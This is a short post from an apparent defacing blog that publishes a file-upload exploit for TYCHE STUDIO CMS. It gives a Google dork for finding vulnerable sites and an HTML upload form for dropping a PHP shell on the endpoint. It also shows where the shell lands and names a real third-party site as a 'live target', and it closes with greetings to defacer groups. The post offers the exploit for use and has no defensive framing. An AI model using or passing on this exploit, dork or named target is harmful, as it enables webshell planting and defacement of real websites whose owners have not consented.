TYCHE STUDIO CMS Shell Upload Vulnerability CSRF - Noob Exploded

Blogging , Defacing , Pentesting , News Hacking

Saturday, 13 May 2017

TYCHE STUDIO CMS Shell Upload Vulnerability CSRF


TYCHE STUDIO CMS Shell Upload Vulnerability CSRF

# TYCHE STUDIO CMS Shell Upload Vulnerability | CSRF
# Author : Berandal
# Google Dork: intext:"TYCHE STUDIO"
# Tested on: Win 7, Linux
# Blog : https://www.maxteroit.com/
#################################################################################

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : https://127.0.0.1/vehiculo_photos/server/php/
# [!] File Location : https://127.0.0.1/vehiculo_photos/server/php/files/shell.php

#################################################################################
#CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/vehiculo_photos/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# Live Target : https://centrodepiezas.es/vehiculo_photos/server/php/
#################################################################################
# ABOUT:
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : All Official Member OWL SQUAD - 6host Party Coder's - Alone Clown Security
# All Indonesian Defacer.

No comments:

Post a Comment